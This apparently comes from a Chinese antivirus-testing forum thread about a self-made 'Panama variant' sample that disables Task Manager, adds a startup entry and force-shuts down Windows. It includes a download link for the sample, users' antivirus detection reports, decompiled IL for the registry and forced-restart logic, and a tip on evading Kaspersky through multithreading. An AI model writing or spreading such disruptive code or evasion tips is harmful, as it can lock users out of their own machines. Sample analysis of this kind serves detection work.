自制样本：Panama变种

显示全部楼层 · 发表于 2021-6-25 18:52:07

本帖最后由 henry217 于 2021-6-25 18:58 编辑

介绍一下吧。本程序是无害程序，一般情况下会让电脑无法正常使用

灵感来自于https://bbs.kafan.cn/forum.php?m ... 183903&pid=48929931
的Panama病毒

动作：
禁用taskmanager>>添加开机启动项>>倒计时六十秒后关机>>如果手动关闭窗口会立刻关机

需要.NET framework 4.8

卡巴在我添加完禁用任务管理器的动作之后阻止启动，一顿操作猛如虎

下载：https://pan.huang1111.cn/s/dwwSV 密码： infected

显示全部楼层 · 发表于 2021-6-25 19:02:37

本帖最后由 aboringman 于 2021-6-25 19:56 编辑

KIS：SW blocked（没有弹窗。。。。。。我以为被过了）

PDM:Trojan.Win32.Generic

360：允许创建启动项后成功运行，关闭窗口挡不住无弹窗拦截。。。。。。（倒数完也是一样）

等一个拒绝的。

显示全部楼层 · 发表于 2021-6-25 19:09:39

本帖最后由 hyx2230 于 2021-6-25 19:22 编辑

火绒启发杀智量双击阻止，允许后主防杀

显示全部楼层 · 发表于 2021-6-25 19:11:22

本帖最后由 BitterLotus 于 2021-6-25 19:30 编辑

//搞任务管理器的
.method private hidebysig instance void ManageTaskManager(int32 arg)
// CODE XREF: Shuttingdown.Form1__Form1_Load+29↑p
{
.maxstack 4
.locals init (class [mscorlib]Microsoft.Win32.RegistryKey V0,
class [mscorlib]Microsoft.Win32.RegistryKey V1)
ldsfld class [mscorlib]Microsoft.Win32.RegistryKey [mscorlib]Microsoft.Win32.Registry::CurrentUser // Push the value of field on the stack
stloc.0 // Pop value from stack into local variable 0
ldloc.0 // Load local variable 0 onto stack
ldstr aSoftwareMicros_0 // "Software\\Microsoft\\Windows\\CurrentVe"...
ldc.i4.1 // Push 1 onto the stack as I4
callvirt instance class [mscorlib]Microsoft.Win32.RegistryKey [mscorlib]Microsoft.Win32.RegistryKey::OpenSubKey(string, bool) // Call a method associated with obj
stloc.1 // Pop value from stack into local variable 1
ldloc.1 // Load local variable 1 onto stack
brtrue.s loc_142 // Branch to target if value is non-zero (true), short form
ldloc.0 // Load local variable 0 onto stack
ldstr aSoftwareMicros_0 // "Software\\Microsoft\\Windows\\CurrentVe"...
callvirt instance class [mscorlib]Microsoft.Win32.RegistryKey [mscorlib]Microsoft.Win32.RegistryKey::CreateSubKey(string) // Call a method associated with obj
stloc.1 // Pop value from stack into local variable 1

复制代码

别问为什么不用DnSpy，问就是懒得下。这玩意竟然用了SunnyUI。。

//倒计时，利用的是加秒数而非Timer。。。
.method public hidebysig specialname rtspecialname instance void .ctor()
{
.maxstack 2
.locals init (valuetype [mscorlib]System.DateTime V0,
valuetype [mscorlib]System.DateTime V1,
valuetype [mscorlib]System.DateTime V2)
ldarg.0 // Load argument 0 onto stack
call instance void [mscorlib]System.Object::.ctor() // Call a method
call valuetype [mscorlib]System.DateTime [mscorlib]System.DateTime::get_Now() // Call a method
stloc.0 // Pop value from stack into local variable 0
ldloca.s 0 // Load address of local variable, short form
call instance valuetype [mscorlib]System.DateTime [mscorlib]System.DateTime::get_Date() // Call a method
stloc.2 // Pop value from stack into local variable 2
ldloca.s 2 // Load address of local variable, short form
ldc.r8 1.0 // Push num of type R8 onto the stack as F
call instance valuetype [mscorlib]System.DateTime [mscorlib]System.DateTime::AddDays(float64) // Call a method
stloc.2 // Pop value from stack into local variable 2
ldloca.s 2 // Load address of local variable, short form
ldc.r8 -1.0 // Push num of type R8 onto the stack as F
call instance valuetype [mscorlib]System.DateTime [mscorlib]System.DateTime::AddSeconds(float64) // Call a method
stloc.1 // Pop value from stack into local variable 1
ldarg.0 // Load argument 0 onto stack
ldloc.1 // Load local variable 1 onto stack
call instance void ShutdownHelper::set_End(valuetype [mscorlib]System.DateTime value) // Call a method
ret // Return from method, possibly returning a value
}

复制代码

//重启部分关键代码
.method public hidebysig instance void Exec(string str)
{
.maxstack 3
.locals init (class [System]System.Diagnostics.Process V0)
.try {
newobj instance void [System]System.Diagnostics.Process::.ctor() // Create a new object
stloc.0 // Pop value from stack into local variable 0
.try {
ldloc.0 // Load local variable 0 onto stack
callvirt instance class [System]System.Diagnostics.ProcessStartInfo [System]System.Diagnostics.Process::get_StartInfo() // Call a method associated with obj
ldstr aCmdExe // "cmd.exe"
callvirt instance void [System]System.Diagnostics.ProcessStartInfo::set_FileName(string) // Call a method associated with obj
ldloc.0 // Load local variable 0 onto stack
callvirt instance class [System]System.Diagnostics.ProcessStartInfo [System]System.Diagnostics.Process::get_StartInfo() // Call a method associated with obj
ldc.i4.0 // Push 0 onto the stack as I4
callvirt instance void [System]System.Diagnostics.ProcessStartInfo::set_UseShellExecute(bool) // Call a method associated with obj
ldloc.0 // Load local variable 0 onto stack
callvirt instance class [System]System.Diagnostics.ProcessStartInfo [System]System.Diagnostics.Process::get_StartInfo() // Call a method associated with obj
ldc.i4.1 // Push 1 onto the stack as I4
callvirt instance void [System]System.Diagnostics.ProcessStartInfo::set_RedirectStandardInput(bool) // Call a method associated with obj
ldloc.0 // Load local variable 0 onto stack
callvirt instance class [System]System.Diagnostics.ProcessStartInfo [System]System.Diagnostics.Process::get_StartInfo() // Call a method associated with obj
ldc.i4.1 // Push 1 onto the stack as I4
callvirt instance void [System]System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(bool) // Call a method associated with obj
ldloc.0 // Load local variable 0 onto stack
callvirt instance class [System]System.Diagnostics.ProcessStartInfo [System]System.Diagnostics.Process::get_StartInfo() // Call a method associated with obj
ldc.i4.1 // Push 1 onto the stack as I4
callvirt instance void [System]System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(bool) // Call a method associated with obj
ldloc.0 // Load local variable 0 onto stack
callvirt instance class [System]System.Diagnostics.ProcessStartInfo [System]System.Diagnostics.Process::get_StartInfo() // Call a method associated with obj
ldc.i4.1 // Push 1 onto the stack as I4
callvirt instance void [System]System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(bool) // Call a method associated with obj
ldloc.0 // Load local variable 0 onto stack
callvirt instance bool [System]System.Diagnostics.Process::Start() // Call a method associated with obj
pop // Pop a value from the stack
ldloc.0 // Load local variable 0 onto stack
callvirt instance class [mscorlib]System.IO.StreamWriter [System]System.Diagnostics.Process::get_StandardInput() // Call a method associated with obj
ldarg.1 // Load argument 1 onto stack
ldstr aExit // "&exit"
call string [mscorlib]System.String::Concat(string, string) // Call a method
callvirt instance void [mscorlib]System.IO.TextWriter::WriteLine(string) // Call a method associated with obj
ldloc.0 // Load local variable 0 onto stack
callvirt instance class [mscorlib]System.IO.StreamWriter [System]System.Diagnostics.Process::get_StandardInput() // Call a method associated with obj
ldc.i4.1 // Push 1 onto the stack as I4
callvirt instance void [mscorlib]System.IO.StreamWriter::set_AutoFlush(bool) // Call a method associated with obj
ldloc.0 // Load local variable 0 onto stack
callvirt instance void [System]System.Diagnostics.Process::WaitForExit() // Call a method associated with obj
ldloc.0 // Load local variable 0 onto stack
callvirt instance void [System]System.Diagnostics.Process::Close() // Call a method associated with obj
leave.s loc_5C3 // Exit a protected region of code, short form
}
.method public hidebysig instance void Restart()
{
.maxstack 8
ldarg.0 // Load argument 0 onto stack
ldstr aShutdownRFT0 // "shutdown -r -f -t 0"
call instance void ShutdownHelper::Exec(string str) // Call a method
ret // Return from method, possibly returning a value
}

复制代码

//自启的部分的代码
loc_65:
ldarg.0 // Load argument 0 onto stack
ldarg.0 // Load argument 0 onto stack
ldstr asc_1016 // "\"
callvirt instance int32 [mscorlib]System.String::LastIndexOf(string) // Call a method associated with obj
ldc.i4.1 // Push 1 onto the stack as I4
add // Add two values, returning a new value
callvirt instance string [mscorlib]System.String::Substring(int32) // Call a method associated with obj
stloc.1 // Pop value from stack into local variable 1
ldsfld class [mscorlib]Microsoft.Win32.RegistryKey [mscorlib]Microsoft.Win32.Registry::LocalMachine // Push the value of field on the stack
ldstr aSoftwareMicros // "SOFTWARE\\Microsoft\\Windows\\CurrentVe"...
ldc.i4.1 // Push 1 onto the stack as I4
callvirt instance class [mscorlib]Microsoft.Win32.RegistryKey [mscorlib]Microsoft.Win32.RegistryKey::OpenSubKey(string, bool) // Call a method associated with obj
stloc.0 // Pop value from stack into local variable 0
ldloc.0 // Load local variable 0 onto stack
brtrue.s loc_9D // Branch to target if value is non-zero (true), short form

复制代码

总结：重启直接调CMD大法好，或许设置注册表也可以。直接搞一个多线程，让卡巴反应不过来。

显示全部楼层 · 发表于 2021-6-25 19:11:24

红伞kill 1x

显示全部楼层 · 发表于 2021-6-25 19:18:04

BitterLotus 发表于 2021-6-25 19:11
DnSpy+一波骚分析占位

自己写：30%

网上当封装：70%

显示全部楼层 · 发表于 2021-6-25 19:18:12

huorong 1x 智量阻止

显示全部楼层 · 发表于 2021-6-25 19:18:15

不想被妳发现发表于 2021-6-25 19:17
看来你是实机运行

虚拟机

显示全部楼层 · 发表于 2021-6-25 19:18:21

心心相印发表于 2021-6-25 19:11
红伞kill 1x

静态杀的？

显示全部楼层 · 发表于 2021-6-25 19:23:39

henry217 发表于 2021-6-25 19:18
静态杀的？

apc

[病毒样本] 自制样本：Panama变种

本帖子中包含更多资源

评分

本帖子中包含更多资源

本帖子中包含更多资源

评分

本帖子中包含更多资源

浏览过的版块